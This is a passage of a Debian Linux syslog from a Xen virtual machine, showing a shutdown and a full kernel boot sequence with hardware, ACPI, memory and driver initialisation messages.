1096May 15 11:32:35 debian kernel: [ 0.908501] serial8250: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A
1097May 15 11:32:35 debian kernel: [ 0.909962] 00:0a: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A
1098May 15 11:32:35 debian kernel: [ 0.910052] input: Macintosh mouse button emulation as /devices/virtual/input/input0
1099May 15 11:32:35 debian kernel: [ 0.910089] PNP: PS/2 Controller [PNP0303:PS2K,PNP0f13:PS2M] at 0x60,0x64 irq 1,12
1100May 15 11:32:35 debian kernel: [ 0.912030] serio: i8042 KBD port at 0x60,0x64 irq 1
1101May 15 11:32:35 debian kernel: [ 0.912048] serio: i8042 AUX port at 0x60,0x64 irq 12
1102May 15 11:32:35 debian kernel: [ 0.912117] mice: PS/2 mouse device common for all mice
1103May 15 11:32:35 debian kernel: [ 0.912500] rtc_cmos 00:05: rtc core: registered rtc_cmos as rtc0
1104May 15 11:32:35 debian kernel: [ 0.912651] rtc0: alarms up to one day, 114 bytes nvram, hpet irqs
1105May 15 11:32:35 debian kernel: [ 0.912658] cpuidle: using governor ladder
1106May 15 11:32:35 debian kernel: [ 0.912659] cpuidle: using governor menu
1107May 15 11:32:35 debian kernel: [ 0.912663] No iBFT detected.
1108May 15 11:32:35 debian kernel: [ 0.913109] input: AT Translated Set 2 keyboard as /devices/platform/i8042/serio0/input/input1
1109May 15 11:32:35 debian kernel: [ 0.913149] TCP cubic registered
1110May 15 11:32:35 debian kernel: [ 0.913401] NET: Registered protocol family 10
1111May 15 11:32:35 debian kernel: [ 0.913919] Mobile IPv6
1112May 15 11:32:35 debian kernel: [ 0.913921] NET: Registered protocol family 17
1113May 15 11:32:35 debian kernel: [ 0.913982] registered taskstats version 1
1114May 15 11:32:35 debian kernel: [ 0.914520] XENBUS: Device with no driver: device/vbd/768
1115May 15 11:32:35 debian kernel: [ 0.914521] XENBUS: Device with no driver: device/vbd/51728
1116May 15 11:32:35 debian kernel: [ 0.914522] XENBUS: Device with no driver: device/vbd/51744
1117May 15 11:32:35 debian kernel: [ 0.914523] XENBUS: Device with no driver: device/vif/0
1118May 15 11:32:35 debian kernel: [ 0.914524] XENBUS: Device with no driver: device/console/0
1119May 15 11:32:35 debian kernel: [ 0.914615] rtc_cmos 00:05: setting system clock to 2020-05-15 15:32:28 UTC (1589556748)
1120May 15 11:32:35 debian kernel: [ 0.914637] Initalizing network drop monitor service
1121May 15 11:32:35 debian kernel: [ 0.914715] Freeing unused kernel memory: 592k freed
1122May 15 11:32:35 debian kernel: [ 0.914839] Write protecting the kernel read-only data: 4236k
1123May 15 11:32:35 debian kernel: [ 0.927946] udev[78]: starting version 164
1124May 15 11:32:35 debian kernel: [ 0.951102] SCSI subsystem initialized
1125May 15 11:32:35 debian kernel: [ 0.952802] Initialising Xen virtual ethernet driver.
1126May 15 11:32:35 debian kernel: [ 0.962944] xvda: xvda1 xvda2 < xvda5 >
1127May 15 11:32:35 debian kernel: [ 0.966729] blkfront: xvdb: barriers enabled
1128May 15 11:32:35 debian kernel: [ 0.966929] xvdb:
1129May 15 11:32:35 debian kernel: [ 0.967282] unknown partition table
1130May 15 11:32:35 debian kernel: [ 0.968819] blkfront: xvdc: barriers enabled
1131May 15 11:32:35 debian kernel: [ 0.969086] xvdc: unknown partition table
1132May 15 11:32:35 debian kernel: [ 0.969540] scsi0 : ata_piix
1133May 15 11:32:35 debian kernel: [ 0.969713] scsi1 : ata_piix
1134May 15 11:32:35 debian kernel: [ 0.969759] ata1: PATA max MWDMA2 cmd 0x1f0 ctl 0x3f6 bmdma 0xc100 irq 14
1135May 15 11:32:35 debian kernel: [ 0.969761] ata2: PATA max MWDMA2 cmd 0x170 ctl 0x376 bmdma 0xc108 irq 15
1136May 15 11:32:35 debian kernel: [ 0.979084] FDC 0 is a S82078B
1137May 15 11:32:35 debian kernel: [ 1.176074] PM: Starting manual resume from disk
1138May 15 11:32:35 debian kernel: [ 1.185140] kjournald starting. Commit interval 5 seconds
1139May 15 11:32:35 debian kernel: [ 1.185151] EXT3-fs: mounted filesystem with ordered data mode.
1140May 15 11:32:35 debian kernel: [ 2.289584] udev[339]: starting version 164
1141May 15 11:32:35 debian kernel: [ 2.332372] input: Power Button as /devices/LNXSYSTM:00/LNXPWRBN:00/input/input2
1142May 15 11:32:35 debian kernel: [ 2.332379] ACPI: Power Button [PWRF]
1143May 15 11:32:35 debian kernel: [ 2.332437] input: Sleep Button as /devices/LNXSYSTM:00/LNXSLPBN:00/input/input3
1144May 15 11:32:35 debian kernel: [ 2.332441] ACPI: Sleep Button [SLPF]
1145May 15 11:32:35 debian kernel: [ 2.343205] processor LNXCPU:00: registered as cooling_device0
1146May 15 11:32:35 debian kernel: [ 2.343475] processor LNXCPU:01: registered as cooling_device1
1147May 15 11:32:35 debian kernel: [ 2.343728] processor LNXCPU:02: registered as cooling_device2
1148May 15 11:32:35 debian kernel: [ 2.343982] processor LNXCPU:03: registered as cooling_device3
1149May 15 11:32:35 debian kernel: [ 2.360726] input: PC Speaker as /devices/platform/pcspkr/input/input4
1150May 15 11:32:35 debian kernel: [ 2.820623] input: ImExPS/2 Generic Explorer Mouse as /devices/platform/i8042/serio1/input/input5
1151May 15 11:32:35 debian kernel: [ 5.629383] Adding 901112k swap on /dev/xvda5. Priority:-1 extents:1 across:901112k SS
1152May 15 11:32:35 debian kernel: [ 5.775956] EXT3 FS on xvda1, internal journal
1153May 15 11:32:35 debian kernel: [ 5.798673] loop: module loaded
1154May 15 11:32:35 debian kernel: [ 6.580711] RPC: Registered udp transport module.
1155May 15 11:32:35 debian kernel: [ 6.580713] RPC: Registered tcp transport module.
1156May 15 11:32:35 debian kernel: [ 6.580714] RPC: Registered tcp NFSv4.1 backchannel transport module.
1157May 15 11:32:35 debian kernel: [ 6.591513] Slow work thread pool: Starting up
1158May 15 11:32:35 debian kernel: [ 6.591740] Slow work thread pool: Ready
1159May 15 11:32:35 debian kernel: [ 6.591793] FS-Cache: Loaded
1160May 15 11:32:35 debian kernel: [ 6.605817] FS-Cache: Netfs 'nfs' registered for caching
1161May 15 11:32:35 debian kernel: [ 6.616039] Installing knfsd (copyright (C) 1996 okir@monad.swb.de).
1162May 15 11:32:35 debian kernel: [ 7.490118] svc: failed to register lockdv1 RPC service (errno 97).
1163May 15 11:32:35 debian kernel: [ 7.491624] NFSD: Using /var/lib/nfs/v4recovery as the NFSv4 state recovery directory
1164May 15 11:32:35 debian kernel: [ 7.492030] NFSD: starting 90-second grace period
1165May 15 11:35:57 debian shutdown[2323]: shutting down for system halt
1166May 15 11:35:58 debian kernel: [ 211.362471] nfsd: last server has exited, flushing export cache
1167May 15 11:36:04 debian kernel: Kernel logging (proc) stopped.
1168May 15 11:36:04 debian rsyslogd: [origin software="rsyslogd" swVersion="4.6.4" x-pid="1418" x-info="http://www.rsyslog.com"] exiting on signal 15.
1169Jan 17 19:55:44 debian kernel: imklog 4.6.4, log source = /proc/kmsg started.
1170Jan 17 19:55:44 debian rsyslogd: [origin software="rsyslogd" swVersion="4.6.4" x-pid="1562" x-info="http://www.rsyslog.com"] (re)start
1171Jan 17 19:55:44 debian kernel: [ 0.000000] Initializing cgroup subsys cpuset
1172Jan 17 19:55:44 debian kernel: [ 0.000000] Initializing cgroup subsys cpu
1173Jan 17 19:55:44 debian kernel: [ 0.000000] Linux version 2.6.32-5-amd64 (Debian 2.6.32-48squeeze6) (jmm@debian.org) (gcc version 4.3.5 (Debian 4.3.5-4) ) #1 SMP Tue May 13 16:34:35 UTC 2014
1174Jan 17 19:55:44 debian kernel: [ 0.000000] Command line: BOOT_IMAGE=/boot/vmlinuz-2.6.32-5-amd64 root=UUID=be5bb36f-7bb4-4900-b459-196278f714b6 ro quiet console=ttyS0
1175Jan 17 19:55:44 debian kernel: [ 0.000000] KERNEL supported cpus:
1176Jan 17 19:55:44 debian kernel: [ 0.000000] Intel GenuineIntel
1177Jan 17 19:55:44 debian kernel: [ 0.000000] AMD AuthenticAMD
1178Jan 17 19:55:44 debian kernel: [ 0.000000] Centaur CentaurHauls
1179Jan 17 19:55:44 debian kernel: [ 0.000000] BIOS-provided physical RAM map:
1180Jan 17 19:55:44 debian kernel: [ 0.000000] BIOS-e820: 0000000000000000 - 000000000009e000 (usable)
1181Jan 17 19:55:44 debian kernel: [ 0.000000] BIOS-e820: 000000000009e000 - 00000000000a0000 (reserved)
1182Jan 17 19:55:44 debian kernel: [ 0.000000] BIOS-e820: 00000000000e0000 - 0000000000100000 (reserved)
1183Jan 17 19:55:44 debian kernel: [ 0.000000] BIOS-e820: 0000000000100000 - 0000000020000000 (usable)
1184Jan 17 19:55:44 debian kernel: [ 0.000000] BIOS-e820: 00000000fc000000 - 0000000100000000 (reserved)
1185Jan 17 19:55:44 debian kernel: [ 0.000000] DMI 2.7 present.
1186Jan 17 19:55:44 debian kernel: [ 0.000000] last_pfn = 0x20000 max_arch_pfn = 0x400000000
1187Jan 17 19:55:44 debian kernel: [ 0.000000] x86 PAT enabled: cpu 0, old 0x7040600070406, new 0x7010600070106
1188Jan 17 19:55:44 debian kernel: [ 0.000000] init_memory_mapping: 0000000000000000-0000000020000000
1189Jan 17 19:55:44 debian kernel: [ 0.000000] RAMDISK: 17759000 - 1803fa59
1190Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: RSDP 00000000000ea020 00024 (v02 Xen)
1191Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: XSDT 00000000fc00e2a0 00054 (v01 Xen HVM 00000000 HVML 00000000)
1192Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: FACP 00000000fc00df60 000F4 (v04 Xen HVM 00000000 HVML 00000000)
1193Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: DSDT 00000000fc0021c0 0BD19 (v02 Xen HVM 00000000 INTL 20090123)
1194Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: FACS 00000000fc002180 00040
1195Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: APIC 00000000fc00e060 000D8 (v02 Xen HVM 00000000 HVML 00000000)
1196Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: HPET 00000000fc00e1b0 00038 (v01 Xen HVM 00000000 HVML 00000000)
1197Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: WAET 00000000fc00e1f0 00028 (v01 Xen HVM 00000000 HVML 00000000)
1198Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: SSDT 00000000fc00e220 00031 (v02 Xen HVM 00000000 INTL 20090123)
1199Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: SSDT 00000000fc00e260 00033 (v02 Xen HVM 00000000 INTL 20090123)
1200Jan 17 19:55:44 debian kernel: [ 0.000000] No NUMA configuration found
1201Jan 17 19:55:44 debian kernel: [ 0.000000] Faking a node at 0000000000000000-0000000020000000
1202Jan 17 19:55:44 debian kernel: [ 0.000000] Bootmem setup node 0 0000000000000000-0000000020000000
1203Jan 17 19:55:44 debian kernel: [ 0.000000] NODE_DATA [0000000000008000 - 000000000000ffff]
1204Jan 17 19:55:44 debian kernel: [ 0.000000] bootmap [0000000000010000 - 0000000000013fff] pages 4
1205Jan 17 19:55:44 debian kernel: [ 0.000000] (6 early reservations) ==> bootmem [0000000000 - 0020000000]
1206Jan 17 19:55:44 debian kernel: [ 0.000000] #0 [0000000000 - 0000001000] BIOS data page ==> [0000000000 - 0000001000]
1207Jan 17 19:55:44 debian kernel: [ 0.000000] #1 [0000006000 - 0000008000] TRAMPOLINE ==> [0000006000 - 0000008000]
1208Jan 17 19:55:44 debian kernel: [ 0.000000] #2 [0001000000 - 00016d7584] TEXT DATA BSS ==> [0001000000 - 00016d7584]
1209Jan 17 19:55:44 debian kernel: [ 0.000000] #3 [0017759000 - 001803fa59] RAMDISK ==> [0017759000 - 001803fa59]
1210Jan 17 19:55:44 debian kernel: [ 0.000000] #4 [000009e000 - 0000100000] BIOS reserved ==> [000009e000 - 0000100000]
1211Jan 17 19:55:44 debian kernel: [ 0.000000] #5 [00016d8000 - 00016d80c8] BRK ==> [00016d8000 - 00016d80c8]
1212Jan 17 19:55:44 debian kernel: [ 0.000000] found SMP MP-table at [ffff8800000fbc50] fbc50
1213Jan 17 19:55:44 debian kernel: [ 0.000000] Zone PFN ranges:
1214Jan 17 19:55:44 debian kernel: [ 0.000000] DMA 0x00000000 -> 0x00001000
1215Jan 17 19:55:44 debian kernel: [ 0.000000] DMA32 0x00001000 -> 0x00100000
1216Jan 17 19:55:44 debian kernel: [ 0.000000] Normal 0x00100000 -> 0x00100000
1217Jan 17 19:55:44 debian kernel: [ 0.000000] Movable zone start PFN for each node
1218Jan 17 19:55:44 debian kernel: [ 0.000000] early_node_map[2] active PFN ranges
1219Jan 17 19:55:44 debian kernel: [ 0.000000] 0: 0x00000000 -> 0x0000009e
1220Jan 17 19:55:44 debian kernel: [ 0.000000] 0: 0x00000100 -> 0x00020000
1221Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: PM-Timer IO Port: 0xb008
1222Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x00] lapic_id[0x00] enabled)
1223Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x01] lapic_id[0x00] disabled)
1224Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x02] lapic_id[0x00] disabled)
1225Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x03] lapic_id[0x00] disabled)
1226Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x04] lapic_id[0x00] disabled)
1227Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x05] lapic_id[0x00] disabled)
1228Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x06] lapic_id[0x00] disabled)
1229Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x07] lapic_id[0x00] disabled)
1230Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x08] lapic_id[0x00] disabled)
1231Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x09] lapic_id[0x00] disabled)
1232Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0a] lapic_id[0x00] disabled)
1233Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0b] lapic_id[0x00] disabled)
1234Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0c] lapic_id[0x00] disabled)
1235Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0d] lapic_id[0x00] disabled)
1236Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0e] lapic_id[0x00] disabled)
1237Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: IOAPIC (id[0x01] address[0xfec00000] gsi_base[0])
1238Jan 17 19:55:44 debian kernel: [ 0.000000] IOAPIC[0]: apic_id 1, version 17, address 0xfec00000, GSI 0-47
1239Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl)
1240Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 5 global_irq 5 low level)
1241Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 10 global_irq 10 low level)
1242Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 11 global_irq 11 low level)
1243Jan 17 19:55:44 debian kernel: [ 0.000000] Using ACPI (MADT) for SMP configuration information
1244Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: HPET id: 0x8086a201 base: 0xfed00000
1245Jan 17 19:55:44 debian kernel: [ 0.000000] SMP: Allowing 15 CPUs, 14 hotplug CPUs
1246Jan 17 19:55:44 debian kernel: [ 0.000000] Xen version 4.2.
1247Jan 17 19:55:44 debian kernel: [ 0.000000] Netfront and the Xen platform PCI driver have been compiled for this kernel: unplug emulated NICs.
1248Jan 17 19:55:44 debian kernel: [ 0.000000] Blkfront and the Xen platform PCI driver have been compiled for this kernel: unplug emulated disks.
1249Jan 17 19:55:44 debian kernel: [ 0.000000] You might have to change the root device
1250Jan 17 19:55:44 debian kernel: [ 0.000000] from /dev/hd[a-d] to /dev/xvd[a-d]
1251Jan 17 19:55:44 debian kernel: [ 0.000000] in your root= kernel command line option
1252Jan 17 19:55:44 debian kernel: [ 0.000000] PM: Registered nosave memory: 000000000009e000 - 00000000000a0000
1253Jan 17 19:55:44 debian kernel: [ 0.000000] PM: Registered nosave memory: 00000000000a0000 - 00000000000e0000
1254Jan 17 19:55:44 debian kernel: [ 0.000000] PM: Registered nosave memory: 00000000000e0000 - 0000000000100000
1255Jan 17 19:55:44 debian kernel: [ 0.000000] Allocating PCI resources starting at 20000000 (gap: 20000000:dc000000)
1256Jan 17 19:55:44 debian kernel: [ 0.000000] Booting paravirtualized kernel on Xen
1257Jan 17 19:55:44 debian kernel: [ 0.000000] NR_CPUS:512 nr_cpumask_bits:512 nr_cpu_ids:15 nr_node_ids:1
1258Jan 17 19:55:44 debian kernel: [ 0.000000] PERCPU: Embedded 30 pages/cpu @ffff880001800000 s90392 r8192 d24296 u131072
1259Jan 17 19:55:44 debian kernel: [ 0.000000] pcpu-alloc: s90392 r8192 d24296 u131072 alloc=1*2097152
1260Jan 17 19:55:44 debian kernel: [ 0.000000] pcpu-alloc: [0] 00 01 02 03 04 05 06 07 08 09 10 11 12 13 14 --
1261Jan 17 19:55:44 debian kernel: [ 0.000000] Built 1 zonelists in Node order, mobility grouping on. Total pages: 129081
1262Jan 17 19:55:44 debian kernel: [ 0.000000] Policy zone: DMA32
1263Jan 17 19:55:44 debian kernel: [ 0.000000] Kernel command line: BOOT_IMAGE=/boot/vmlinuz-2.6.32-5-amd64 root=UUID=be5bb36f-7bb4-4900-b459-196278f714b6 ro quiet console=ttyS0
1264Jan 17 19:55:44 debian kernel: [ 0.000000] PID hash table entries: 2048 (order: 2, 16384 bytes)
1265Jan 17 19:55:44 debian kernel: [ 0.000000] Initializing CPU#0
1266Jan 17 19:55:44 debian kernel: [ 0.000000] xsave/xrstor: enabled xstate_bv 0x7, cntxt size 0x340
1267Jan 17 19:55:44 debian kernel: [ 0.000000] Checking aperture...
1268Jan 17 19:55:44 debian kernel: [ 0.000000] No AGP bridge found
1269Jan 17 19:55:44 debian kernel: [ 0.000000] Memory: 497460k/524288k available (3087k kernel code, 392k absent, 26436k reserved, 2036k data, 592k init)
1270Jan 17 19:55:44 debian kernel: [ 0.000000] SLUB: Genslabs=14, HWalign=64, Order=0-3, MinObjects=0, CPUs=15, Nodes=1
1271Jan 17 19:55:44 debian kernel: [ 0.000000] Hierarchical RCU implementation.
1272Jan 17 19:55:44 debian kernel: [ 0.000000] NR_IRQS:4352 nr_irqs:936
1273Jan 17 19:55:44 debian kernel: [ 0.000000] Xen HVM callback vector for event delivery is enabled
1274Jan 17 19:55:44 debian kernel: [ 0.000000] Console: colour VGA+ 80x25
1275Jan 17 19:55:44 debian kernel: [ 0.000000] console [ttyS0] enabled
1276Jan 17 19:55:44 debian kernel: [ 0.000000] Detected 2400.068 MHz processor.
1277Jan 17 19:55:44 debian kernel: [ 0.008000] Calibrating delay loop (skipped), value calculated using timer frequency.. 4800.13 BogoMIPS (lpj=9600272)
1278Jan 17 19:55:44 debian kernel: [ 0.008000] Security Framework initialized
1279Jan 17 19:55:44 debian kernel: [ 0.008000] SELinux: Disabled at boot.
1280Jan 17 19:55:44 debian kernel: [ 0.008000] Dentry cache hash table entries: 65536 (order: 7, 524288 bytes)
1281Jan 17 19:55:44 debian kernel: [ 0.008000] Inode-cache hash table entries: 32768 (order: 6, 262144 bytes)
1282Jan 17 19:55:44 debian kernel: [ 0.008000] Mount-cache hash table entries: 256
1283Jan 17 19:55:44 debian kernel: [ 0.008000] Initializing cgroup subsys ns
1284Jan 17 19:55:44 debian kernel: [ 0.008000] Initializing cgroup subsys cpuacct
1285Jan 17 19:55:44 debian kernel: [ 0.008000] Initializing cgroup subsys devices
1286Jan 17 19:55:44 debian kernel: [ 0.008000] Initializing cgroup subsys freezer
1287Jan 17 19:55:44 debian kernel: [ 0.008000] Initializing cgroup subsys net_cls
1288Jan 17 19:55:44 debian kernel: [ 0.008000] CPU: Physical Processor ID: 0
1289Jan 17 19:55:44 debian kernel: [ 0.008000] CPU: L1 I cache: 32K, L1 D cache: 32K
1290Jan 17 19:55:44 debian kernel: [ 0.008000] CPU: L2 cache: 256K
1291Jan 17 19:55:44 debian kernel: [ 0.008000] CPU: L3 cache: 30720K
1292Jan 17 19:55:44 debian kernel: [ 0.008000] CPU 0/0x0 -> Node 0
1293Jan 17 19:55:44 debian kernel: [ 0.008000] mce: CPU supports 2 MCE banks
1294Jan 17 19:55:44 debian kernel: [ 0.008000] Performance Events: unsupported p6 CPU model 63 no PMU driver, software events only.
1295Jan 17 19:55:44 debian kernel: [ 0.008000] SMP alternatives: switching to UP code
1296Jan 17 19:55:44 debian kernel: [ 0.024870] ACPI: Core revision 20090903
1297Jan 17 19:55:44 debian kernel: [ 0.027609] Not enabling x2apic, Intr-remapping init failed.
1298Jan 17 19:55:44 debian kernel: [ 0.027611] Setting APIC routing to physical flat
1299Jan 17 19:55:44 debian kernel: [ 0.028367] ..TIMER: vector=0x30 apic1=0 pin1=2 apic2=0 pin2=0
1300Jan 17 19:55:44 debian kernel: [ 0.132003] CPU0: Intel(R) Xeon(R) CPU E5-2676 v3 @ 2.40GHz stepping 02
1301Jan 17 19:55:44 debian kernel: [ 0.132019] installing Xen timer for CPU 0
1302Jan 17 19:55:44 debian kernel: [ 0.132127] Brought up 1 CPUs
1303Jan 17 19:55:44 debian kernel: [ 0.132129] Total of 1 processors activated (4800.13 BogoMIPS).
1304Jan 17 19:55:44 debian kernel: [ 0.132599] devtmpfs: initialized
1305Jan 17 19:55:44 debian kernel: [ 0.134154] regulator: core version 0.5
1306Jan 17 19:55:44 debian kernel: [ 0.134187] NET: Registered protocol family 16
1307Jan 17 19:55:44 debian kernel: [ 0.134277] ACPI: bus type pci registered
1308Jan 17 19:55:44 debian kernel: [ 0.134781] PCI: Using configuration type 1 for base access
1309Jan 17 19:55:44 debian kernel: [ 0.134964] bio: create slab <bio-0> at 0
1310Jan 17 19:55:44 debian kernel: [ 0.180504] ACPI: Interpreter enabled
1311Jan 17 19:55:44 debian kernel: [ 0.180506] ACPI: (supports S0 S3 S4 S5)
1312Jan 17 19:55:44 debian kernel: [ 0.180517] ACPI: Using IOAPIC for interrupt routing
1313Jan 17 19:55:44 debian kernel: [ 0.264015] ACPI: No dock devices found.
1314Jan 17 19:55:44 debian kernel: [ 0.264190] ACPI: PCI Root Bridge [PCI0] (0000:00)
1315Jan 17 19:55:44 debian kernel: [ 0.270647] * Found PM-Timer Bug on the chipset. Due to workarounds for a bug,
1316Jan 17 19:55:44 debian kernel: [ 0.270648] * this clock source is slow. Consider trying other clock sources
1317Jan 17 19:55:44 debian kernel: [ 0.272151] pci 0000:00:01.3: quirk: region b000-b03f claimed by PIIX4 ACPI
1318Jan 17 19:55:44 debian kernel: [ 0.535472] ACPI: PCI Interrupt Link [LNKA] (IRQs *5 10 11)
1319Jan 17 19:55:44 debian kernel: [ 0.535913] ACPI: PCI Interrupt Link [LNKB] (IRQs 5 *10 11)
1320Jan 17 19:55:44 debian kernel: [ 0.536298] ACPI: PCI Interrupt Link [LNKC] (IRQs 5 10 *11)
1321Jan 17 19:55:44 debian kernel: [ 0.536733] ACPI: PCI Interrupt Link [LNKD] (IRQs *5 10 11)
1322Jan 17 19:55:44 debian kernel: [ 0.537047] vgaarb: device added: PCI:0000:00:02.0,decodes=io+mem,owns=io+mem,locks=none
1323Jan 17 19:55:44 debian kernel: [ 0.537049] vgaarb: loaded
1324Jan 17 19:55:44 debian kernel: [ 0.537091] PCI: Using ACPI for IRQ routing
1325Jan 17 19:55:44 debian kernel: [ 0.537927] HPET: 3 timers in total, 0 timers will be used for per-cpu timer
1326Jan 17 19:55:44 debian kernel: [ 0.537942] hpet0: at MMIO 0xfed00000, IRQs 2, 8, 0
1327Jan 17 19:55:44 debian kernel: [ 0.537944] hpet0: 3 comparators, 64-bit 62.500000 MHz counter
1328Jan 17 19:55:44 debian kernel: [ 0.544013] Switching to clocksource xen
1329Jan 17 19:55:44 debian kernel: [ 0.544701] pnp: PnP ACPI init
1330Jan 17 19:55:44 debian kernel: [ 0.544706] ACPI: bus type pnp registered
1331Jan 17 19:55:44 debian kernel: [ 0.616781] pnp: PnP ACPI: found 12 devices
1332Jan 17 19:55:44 debian kernel: [ 0.616783] ACPI: ACPI bus type pnp unregistered
1333Jan 17 19:55:44 debian kernel: [ 0.616790] system 00:00: iomem range 0x0-0x9ffff could not be reserved
1334Jan 17 19:55:44 debian kernel: [ 0.616794] system 00:03: ioport range 0x8a0-0x8a3 has been reserved
1335Jan 17 19:55:44 debian kernel: [ 0.616795] system 00:03: ioport range 0xcc0-0xccf has been reserved
1336Jan 17 19:55:44 debian kernel: [ 0.616797] system 00:03: ioport range 0x4d0-0x4d1 has been reserved
1337Jan 17 19:55:44 debian kernel: [ 0.616801] system 00:0b: ioport range 0x10c0-0x1141 has been reserved
1338Jan 17 19:55:44 debian kernel: [ 0.616802] system 00:0b: ioport range 0xb044-0xb047 has been reserved
1339Jan 17 19:55:44 debian kernel: [ 0.629103] NET: Registered protocol family 2
1340Jan 17 19:55:44 debian kernel: [ 0.629154] IP route cache hash table entries: 4096 (order: 3, 32768 bytes)
1341Jan 17 19:55:44 debian kernel: [ 0.629278] TCP established hash table entries: 16384 (order: 6, 262144 bytes)
1342Jan 17 19:55:44 debian kernel: [ 0.629319] TCP bind hash table entries: 16384 (order: 6, 262144 bytes)
1343Jan 17 19:55:44 debian kernel: [ 0.629351] TCP: Hash tables configured (established 16384 bind 16384)
1344Jan 17 19:55:44 debian kernel: [ 0.629352] TCP reno registered
1345Jan 17 19:55:44 debian kernel: [ 0.629438] NET: Registered protocol family 1
1346Jan 17 19:55:44 debian kernel: [ 0.629446] pci 0000:00:00.0: Limiting direct PCI/PCI transfers
1347Jan 17 19:55:44 debian kernel: [ 0.629540] pci 0000:00:01.0: PIIX3: Enabling Passive Release
1348Jan 17 19:55:44 debian kernel: [ 0.629605] pci 0000:00:01.0: Activating ISA DMA hang workarounds
1349Jan 17 19:55:44 debian kernel: [ 0.629702] Unpacking initramfs...
1350Jan 17 19:55:44 debian kernel: [ 1.002144] Freeing initrd memory: 9114k freed
1351Jan 17 19:55:44 debian kernel: [ 1.004042] audit: initializing netlink socket (disabled)
1352Jan 17 19:55:44 debian kernel: [ 1.004049] type=2000 audit(1610931219.820:1): initialized
1353Jan 17 19:55:44 debian kernel: [ 1.022606] HugeTLB registered 2 MB page size, pre-allocated 0 pages
1354Jan 17 19:55:44 debian kernel: [ 1.023264] VFS: Disk quotas dquot_6.5.2
1355Jan 17 19:55:44 debian kernel: [ 1.023291] Dquot-cache hash table entries: 512 (order 0, 4096 bytes)
1356Jan 17 19:55:44 debian kernel: [ 1.023338] msgmni has been set to 989
1357Jan 17 19:55:44 debian kernel: [ 1.023438] alg: No test for stdrng (krng)
1358Jan 17 19:55:44 debian kernel: [ 1.023465] Block layer SCSI generic (bsg) driver version 0.4 loaded (major 253)
1359Jan 17 19:55:44 debian kernel: [ 1.023466] io scheduler noop registered
1360Jan 17 19:55:44 debian kernel: [ 1.023467] io scheduler anticipatory registered
1361Jan 17 19:55:44 debian kernel: [ 1.023468] io scheduler deadline registered
1362Jan 17 19:55:44 debian kernel: [ 1.023502] io scheduler cfq registered (default)
1363Jan 17 19:55:44 debian kernel: [ 1.023726] xen-platform-pci 0000:00:03.0: PCI INT A -> GSI 28 (level, low) -> IRQ 28
1364Jan 17 19:55:44 debian kernel: [ 1.023752] Grant table initialized
1365Jan 17 19:55:44 debian kernel: [ 1.025195] Linux agpgart interface v0.103
1366Jan 17 19:55:44 debian kernel: [ 1.025212] Serial: 8250/16550 driver, 4 ports, IRQ sharing enabled
1367Jan 17 19:55:44 debian kernel: [ 1.026935] serial8250: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A
1368Jan 17 19:55:44 debian kernel: [ 1.029317] 00:0a: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A
1369Jan 17 19:55:44 debian kernel: [ 1.029436] input: Macintosh mouse button emulation as /devices/virtual/input/input0
1370Jan 17 19:55:44 debian kernel: [ 1.029494] PNP: PS/2 Controller [PNP0303:PS2K,PNP0f13:PS2M] at 0x60,0x64 irq 1,12
1371Jan 17 19:55:44 debian kernel: [ 1.032600] serio: i8042 KBD port at 0x60,0x64 irq 1
1372Jan 17 19:55:44 debian kernel: [ 1.032603] serio: i8042 AUX port at 0x60,0x64 irq 12
1373Jan 17 19:55:44 debian kernel: [ 1.032657] mice: PS/2 mouse device common for all mice
1374Jan 17 19:55:44 debian kernel: [ 1.033794] input: AT Translated Set 2 keyboard as /devices/platform/i8042/serio0/input/input1
1375Jan 17 19:55:44 debian kernel: [ 1.034500] rtc_cmos 00:05: rtc core: registered rtc_cmos as rtc0
1376Jan 17 19:55:44 debian kernel: [ 1.034576] rtc0: alarms up to one day, 114 bytes nvram, hpet irqs
1377Jan 17 19:55:44 debian kernel: [ 1.034582] cpuidle: using governor ladder
1378Jan 17 19:55:44 debian kernel: [ 1.034583] cpuidle: using governor menu
